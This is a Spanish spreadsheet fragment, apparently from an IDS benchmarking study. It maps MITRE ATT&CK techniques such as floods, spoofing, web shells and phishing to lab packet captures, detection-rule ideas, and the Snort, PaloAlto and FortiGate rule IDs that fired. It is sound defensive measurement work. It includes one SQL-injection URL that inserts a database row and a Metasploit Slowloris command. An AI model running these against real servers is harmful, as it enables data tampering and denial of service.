      <t>: ambas versiones de Snort no analizan el flujo HPEXT de la captura de paquetes (irrelevante para los resultados)</t>
    </r>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>LAND</t>
  </si>
  <si>
    <t>T1499-Land_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte envío de mensajes TCP SYN procedentes de la misma dirección IP a la que van dirigidos los paquetes. Los puertos origen/destino pueden ser incluso idénticos</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.5</t>
  </si>
  <si>
    <t>Manual [1] / E.11</t>
  </si>
  <si>
    <t>Manual [5] / 5.13.2</t>
  </si>
  <si>
    <t>2100527, 2002752, 2002749, 2001579</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100527, 2002752, 2002749, 2001579, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001579</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, 2001579, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001579</t>
    </r>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Suplantación MAC</t>
  </si>
  <si>
    <t>ip</t>
  </si>
  <si>
    <t>T1499-Mac_spoof_[1].pcapng</t>
  </si>
  <si>
    <t>ARP</t>
  </si>
  <si>
    <t>Mediante el uso de preprocesadores, la detección de este ataque es posible estableciendo un asociación entre la IP a proteger y su dirección MAC correspondiente. De esta forma, se puede fundar una regla que detecte mensajes ARP que incumplen esta asociación y que avistan de un posible ataque por suplantación MAC</t>
  </si>
  <si>
    <t>Manual [1]</t>
  </si>
  <si>
    <t>Manual [1] / E.2</t>
  </si>
  <si>
    <t>La suplantacion MAC siempre se considera como un ataque</t>
  </si>
  <si>
    <t>366, 29456, 384, 408</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 2100366</t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 2100366, 2100384, 2002752, 2002749, 2100408, 2101620</t>
  </si>
  <si>
    <t xml:space="preserve">2002749, 2002752 </t>
  </si>
  <si>
    <t>366, 29456, 384, 408, 2100366, 2100384, 2100408, 2101620</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza los tres flujos ICMP de la captura. Estos flujos no son relevantes para el ataque por lo que aunque afectan a la generación de alertas no son definitivos.</t>
    </r>
  </si>
  <si>
    <t>Reflexión SYN-ACK</t>
  </si>
  <si>
    <t>T1499-Reflexion_synack_[1].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes TCP SYN-ACK no solicitados previamente por el la red a proteger</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.2</t>
  </si>
  <si>
    <t>Manual [1] / E.10</t>
  </si>
  <si>
    <t>NO                                                                 (el propio ataque consiste en el envío de peticiones incompletas al servidor)</t>
  </si>
  <si>
    <t>2002752, 2002749, 40063</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: ambas versiones de Snort no analizan el flujo HPEXT de la captura de paquetes (irrelevante para los resultados)</t>
    </r>
  </si>
  <si>
    <t>Reseteo de Conexión</t>
  </si>
  <si>
    <t>ettercap, netwox, nping</t>
  </si>
  <si>
    <t>T1499-Reseteo_[1].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique reseteos de conexión periódicos y desde direcciones sospechosas</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.6</t>
  </si>
  <si>
    <t>Manual [1] / E.12</t>
  </si>
  <si>
    <t>2002752, 2002749, 1325</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv3 considera un flujo de retransmisión como otro nuevo. Esto no afecta en absoluto a los resultados (no hay flujos sin analizar)</t>
    </r>
  </si>
  <si>
    <t>Inundación SYN con suplantación</t>
  </si>
  <si>
    <t>T1499-Syn_suplantacion_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío prolongado de mensajes TCP SYN que dejan los sockets del equipo a proteger en estado SYN-RECV (no se terminan los handshake de las conexiones TCP establecidas)</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.3</t>
  </si>
  <si>
    <t>Manual [1] / E.9</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: ambas versiones de Snort no analizan los dos flujos HPEXT de la captura de paquetes (irrelevante para los resultados)</t>
    </r>
  </si>
  <si>
    <t>Denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>T1499.001-OS_Exhaustion_Flood_[3].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el uso de Slowloris para realizar ataque DDos mediante la comprobación de campos de bytes típicos de la herramienta</t>
  </si>
  <si>
    <t>Uso de metasploit para ataque DoS con herramienta Slowloris. Comando: use auxiliary/dos/http/slowloris</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.16</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.16.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.16.5 y Manual [5] / 5.13.2</t>
  </si>
  <si>
    <t>2012870, 40063</t>
  </si>
  <si>
    <t>2002752, 2002749, 2012870, 40063</t>
  </si>
  <si>
    <t>2002752, 2002749, 2012870</t>
  </si>
  <si>
    <t>web-browsing -- internet-utility</t>
  </si>
  <si>
    <t xml:space="preserve">54547, 40094, </t>
  </si>
  <si>
    <t>40094, 54547</t>
  </si>
  <si>
    <t>Una vez detectado el ataque mediante IPS con una alerta que indica HTTP Flood, mediante Control de Aplicaciones somos capaces de catalogar una gran cantidad de flujos identificando aquellos que se corresponden a HTTP</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Slowhttptest</t>
  </si>
  <si>
    <t>T1499.02-Slowhttptest-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Uso de Slowhttptest para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Manual [5] / C.29</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP parciales</t>
  </si>
  <si>
    <t>Slowloris</t>
  </si>
  <si>
    <t>T1499.02-Slowloris-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP parciales o uso de Slowloris</t>
  </si>
  <si>
    <t>Uso de Slowloris para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>15578, 2002749, 2002752</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la varianza respecto a los flujos detectados se debe a la propia interpretación de flujos de Snortv3 y a flujos ICMP ignorados por Snortv2. Ninguna de las dos son relevantes para los resultados.</t>
    </r>
  </si>
  <si>
    <t>17533, 107347979</t>
  </si>
  <si>
    <t>9999, 14984, 32452, 40018</t>
  </si>
  <si>
    <t>14984, 32452, 40018</t>
  </si>
  <si>
    <t>9999, 40018, 32452</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>GoldenEye</t>
  </si>
  <si>
    <t>T1499.03-GoldenEye-C2018_[6].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve"> Reglas que detecen envío masivo de solicitudes a servidor web</t>
  </si>
  <si>
    <t>Uso de GoldenEye para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>2016897, 2016898</t>
  </si>
  <si>
    <t>2016897, 2016898, 50447</t>
  </si>
  <si>
    <t>2002749, 2002752, 2016897, 2016898, 2018208, 2002192, 2002822, 50447</t>
  </si>
  <si>
    <t>2016897, 2016898, 2018208, 2002192, 2002822, 50447</t>
  </si>
  <si>
    <t>2002749, 2002752, 2016898, 2002192, 2002822, 50447</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la varianza respecto a los flujos detectados se debe a la propia interpretación de flujos de ambas versiones. No hay pérdida de información</t>
    </r>
  </si>
  <si>
    <t>Hulk</t>
  </si>
  <si>
    <t>T1499.03-Hulk-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Uso de Hulk para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>2012801, 50447, 22953</t>
  </si>
  <si>
    <t>2012801, 50447</t>
  </si>
  <si>
    <t>2002192, 2002749, 2002752, 2002822, 2012801, 2012914, 50447, 22953</t>
  </si>
  <si>
    <t>2002192, 2002822, 2012801, 2012914, 50447, 22953</t>
  </si>
  <si>
    <t>2002192, 2002749, 2002752, 2002822, 2012801, 2012914, 50447</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: la varianza respecto a los flujos detectados se debe a la propia interpretación de flujos de ambas versiones. No hay pérdida de información</t>
    </r>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>SQL Stored Procedures</t>
  </si>
  <si>
    <t>T1505.001</t>
  </si>
  <si>
    <t>None (SQL injection using URL)</t>
  </si>
  <si>
    <t>T1505.001-SQL_inyection_[3].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un intento de inyección SQL insertada en la URL de acceso a una página web, o en su defecto en algunos de los campos de las peticiones</t>
  </si>
  <si>
    <t>"Ejecución de URL en navegador web (http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20INSERT%20INTO%20contactos%20values%20(3,%20%27Atacante%27,%20%27Atacante%27,%20%27Atacante%27,%20100)--)"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.7</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.7.4 y Manual [5] / C.30</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.7.5</t>
  </si>
  <si>
    <t>2011039, 2006444</t>
  </si>
  <si>
    <t>13513, 50447, 19438, 2011039, 2006444</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>13513</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438, 2011039, 2006444</t>
    </r>
  </si>
  <si>
    <t>13513, 19438, 2011039, 2006444</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100472, 2011039, 2006444, 13513, 50447, 19438</t>
  </si>
  <si>
    <t>2002752, 2100472, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2011039, 2006444, 13513,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>19438</t>
    </r>
  </si>
  <si>
    <t>50447, 2002752, 2002749, 2100472</t>
  </si>
  <si>
    <t>2011039, 2006444, 13513, 19438</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza un flujo ICMP. Este flujo no contiene información relacionada con el ataque, por lo que no afecta a los resultados</t>
    </r>
  </si>
  <si>
    <t>Web Shell</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Shell Web</t>
  </si>
  <si>
    <t>T1505.005-Shell_Web_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecta el intento de escaneo para comprobar la existencia de backdoor. </t>
  </si>
  <si>
    <t>El ataque busca aprovechar configuracion vulnerable de un servidor WampServer que permite subir y borrar contenido web mediante el uso de HTTP PUT y HTTP DELETE.
Se realiza la subida de un payload a un servidor web</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.5.1</t>
  </si>
  <si>
    <t>Manual [5] / C.31</t>
  </si>
  <si>
    <t>La creación de un Shell Remoto haciendo uso de una conexión web siempre es un ataque</t>
  </si>
  <si>
    <t>50447, 50182, 50202</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50202</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50202</t>
    </r>
  </si>
  <si>
    <t>50182, 50202</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006408, 50447, 50182, 50202</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2006408, 50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50182, 50202</t>
    </r>
  </si>
  <si>
    <t>50202, 50182, 50447, 2002752, 2002749</t>
  </si>
  <si>
    <t>50202, 50182</t>
  </si>
  <si>
    <t>9999, 58463</t>
  </si>
  <si>
    <t>58463, 9999</t>
  </si>
  <si>
    <t>Paloalto detecta la subida del payload al servidor a traves de los SIDs 58463, 9999</t>
  </si>
  <si>
    <t>Internal Spear-phishing</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Phishing interno entre equipos pertenecientes a un dominio con servidor de correo habilitado</t>
  </si>
  <si>
    <t>MailEnabler, Thunderbird</t>
  </si>
  <si>
    <t>T1534-Internal_spearphishing_[4].pcapng</t>
  </si>
  <si>
    <t>SMTP</t>
  </si>
  <si>
    <t>Detección por anomalías, análisis de la estructura de correos electrónicos, petición de información confidencial, etc</t>
  </si>
  <si>
    <t>Manual [4] /  3.14</t>
  </si>
  <si>
    <t>Manual [4] / B.14</t>
  </si>
  <si>
    <t>Manual [4] / 4.14</t>
  </si>
  <si>
    <t>El Phishing, en general, puede confundirse con actividad legítima (eso es lo que hace que el ataque tenga éxito). En ese sentido, aunque siempre será un ataque, dependiendo del contexto podrá no distinguirse de una actividad legítima</t>
  </si>
  <si>
    <t>655, 1394, 1917, 3065</t>
  </si>
  <si>
    <t>1394, 1917, 3065</t>
  </si>
  <si>
    <t>655, 1394, 1917, 3065, 38043, 23858</t>
  </si>
  <si>
    <t>1394, 1917, 3065, 38043, 23858</t>
  </si>
  <si>
    <t>655, 1394, 1917, 3065, 38043, 23858, 2101917, 2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>2101917, 2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>1394, 1917, 3065, 38043, 23858, 2101917, 2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>smtp-base -- email</t>
  </si>
  <si>
    <t>56953, 56951, 57018, 56952</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transferir archivos de una cuenta a otra mediante un servicio en la nube</t>
  </si>
  <si>
    <t>OneDrive</t>
  </si>
  <si>
    <t>T1537-Transfer_Data_to_Cloud_Account_[5].pcapng</t>
  </si>
  <si>
    <t>Transferir entre dos cuentas en la nube unos ficheros</t>
  </si>
  <si>
    <t>Manual [5] /  4.9.2</t>
  </si>
  <si>
    <t>Manual [5] / C.10</t>
  </si>
  <si>
    <t>Manual [5] /  5.12.6</t>
  </si>
  <si>
    <t>Transferir datos a la nube puede considerarse tráfico legítimo o ataque dependiendo de las circunstancias</t>
  </si>
  <si>
    <t>254, 59597</t>
  </si>
  <si>
    <t>2002752, 2002749, 254, 59597</t>
  </si>
  <si>
    <t>ms-onedrive-business -- file sharing</t>
  </si>
  <si>
    <t>93031, 9999, 14978</t>
  </si>
  <si>
    <t>93031, 14978</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t xml:space="preserve">Modificación de imagen de SO mediante la suplantación de un Server TFTP </t>
  </si>
  <si>
    <t>T1542.005-TFTP_Boot_[5].pcapng</t>
  </si>
  <si>
    <t>TFTP</t>
  </si>
  <si>
    <t>**Regla personalizada que comprueba si la IP del servidor TFTP es la del servidor legítimo ** Que el SO enviado por el atacante contenga algun tipo de malware detectable por un IDS</t>
  </si>
  <si>
    <t>Servidor TFTP utilizando Iventoy</t>
  </si>
  <si>
    <t>Manual [5] /  4.3.2</t>
  </si>
  <si>
    <t>Manual [5] / C.11</t>
  </si>
  <si>
    <t>Manual [5] /  5.5.3</t>
  </si>
  <si>
    <t>El arranque mediante TFTP desde otro servidor TFTP siempre se considera como un ataque</t>
  </si>
  <si>
    <t>1444, 2008120, 2008119, 2008118</t>
  </si>
  <si>
    <t>1444, 2008119, 2008118</t>
  </si>
  <si>
    <t>1444, 50447, 24303, 46533, 2100527, 2002749, 2002752, 2101444, 2008120, 2008119, 2008118, 2006408, 2000418, 2011803, 2000419, 2101620</t>
  </si>
  <si>
    <t>2002749, 2002752, 2101620, 2100527, 2008120, 2101444</t>
  </si>
  <si>
    <t>1444, 50447, 24303, 46533, 2008119, 2008118, 2006408, 2000418, 2011803, 2000419</t>
  </si>
  <si>
    <t>2002752, 2101444, 2100527, 2008120, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 omite 8 flujos ICMPv6 mientras que Snortv3 omite 4 (no tienen relevancia para el ataque). Entre estos flujos se encuentran algunos con la opción Hop-by-Hop que no son analizados por ninguna de las versiones</t>
    </r>
  </si>
  <si>
    <t>tftp -- file sharing</t>
  </si>
  <si>
    <t>9999, 31914</t>
  </si>
  <si>
    <t>PaloAlto detecta URLs como amenaza con URI relacionada con arranque por red PXE. Además, PaloAlto detecta el uso de TFTP. En conjunto con las alertas detectadas mediante IPS, podemos llegar a considerar que PaloAlto detecta un arranque TFTP que en determinados casos, es un TP</t>
  </si>
  <si>
    <t>Privilege Escalation</t>
  </si>
  <si>
    <t>Create or Modify System Process</t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t>Windows Service</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Creación o modificación de servicio de Windows para garantizar la persistencia</t>
  </si>
  <si>
    <t>T1543.003-CreateSystemProcessWindowsService_[5].pcapng</t>
  </si>
  <si>
    <t>Crear servicio Windows para garantizar persistencia</t>
  </si>
  <si>
    <t>Manual [5] / 4.3.4</t>
  </si>
  <si>
    <t>Manual [5] / C.43</t>
  </si>
  <si>
    <t>Manual [5] / 5.5.6</t>
  </si>
  <si>
    <t>La creacion de un servicio de Windows puede considerarse como tráfico legítimo pero tambien como un ataque dependiendo. Esta accion podria realizarla un administrador de red o un atacante</t>
  </si>
  <si>
    <t>2035480, 2018959, 2025644</t>
  </si>
  <si>
    <t>2035480, 2018959</t>
  </si>
  <si>
    <t>2035480, 2018959, 2025644, 53331</t>
  </si>
  <si>
    <t>2035480, 2018959, 53331</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">503331, 2002752, 2002749, 2035480, 2018959, 2009080, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF34A853"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2000419</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">503331, 2035480, 2018959, 2009080, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color theme="7"/>
        <sz val="11.0"/>
      </rPr>
      <t>2025644</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2000419</t>
    </r>
  </si>
  <si>
    <t>503331, 2002752, 2002749, 2035480, 2018959, 2009080, 2025644, 2000419</t>
  </si>
  <si>
    <t>503331, 2035480, 2018959, 2009080, 2000419</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>I</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>nstancias Colaterales</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: el ataque contiene un establecimiento de conexión previo mediante Metasploit, detectado por Snort. El ataque principal, sin embargo, no es detectado</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">Ataques Colaterales: </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b val="0"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>FortiGate detecta el establecimiento de la sesión con un shell remoto</t>
    </r>
  </si>
  <si>
    <t>Adversary-in-the-Middle</t>
  </si>
  <si>
    <t>T1557</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>Suplantación ARP</t>
  </si>
  <si>
    <t>arpspoof</t>
  </si>
  <si>
    <t>T1557-Arp_spoof_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] / E.3</t>
  </si>
  <si>
    <t>Manual [5] / 5.7.3</t>
  </si>
  <si>
    <t>La suplantacion ARP siempre es un ataque</t>
  </si>
  <si>
    <t>29456, 384, 366, 408</t>
  </si>
  <si>
    <t>29456, 384, 366, 408, 2100366</t>
  </si>
  <si>
    <t>29456, 384, 366, 408, 2100469, 2100384, 2002752, 2002749, 2100366, 2100408</t>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100469, 2100408, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados Snort</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: Snortv2 no analiza los dos flujos ICMP. Estos flujos no son relevantes para el ataque</t>
    </r>
  </si>
  <si>
    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCPig, servidor DHCP</t>
  </si>
  <si>
    <t>T1557-Dhcp_spoofing_[1].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK). Otra alternativa es una regla personalizada que analice mensajes DHCP ACK con direcciones IP de servidores DNS distinta a la establecida en la red </t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.19</t>
  </si>
  <si>
    <t>DHCP Spoof siempre se considera como un ataque</t>
  </si>
  <si>
    <t>2100527, 2002749, 2002752, 46533</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Contaje Mensajes</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t xml:space="preserve">: el CSV de alertas identifica paquetes distintos con el mismo IDPaq (porque el contenido de los paquetes es idéntico), causando que el cálculo devuelva menos mensajes que flujos. Se ha arreglado esta errata de forma manual (RS4: 2 mensajes → 147 mensajes)                                                 </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <b/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>Flujos Detectados</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="14.0"/>
      </rPr>
      <t>: hay dos flujos que no son TCP/UDP/ICMP. Uno es un flujo HPEXT y otro un flujo IGMP. El primero no es analizado por Snortv3 y Snortv2 y el segundo no es analizado por Snortv2. No son relevantes para el ataque.</t>
    </r>
  </si>
  <si>
    <t>Agujero 196</t>
  </si>
  <si>
    <t>ettercap</t>
  </si>
  <si>
    <t>T1557-Hole196_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  2.1.2.1.1</t>
  </si>
  <si>
    <t>Manual [1] / E.28</t>
  </si>
  <si>
    <t>Un ataque de agujero 196 siempre se considera como un ataque</t>
  </si>
  <si>
    <t>2100366, 29456, 384, 366, 408</t>
  </si>
  <si>
    <t>29456, 384, 366, 408, 2100366, 2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <r>
      <rPr>
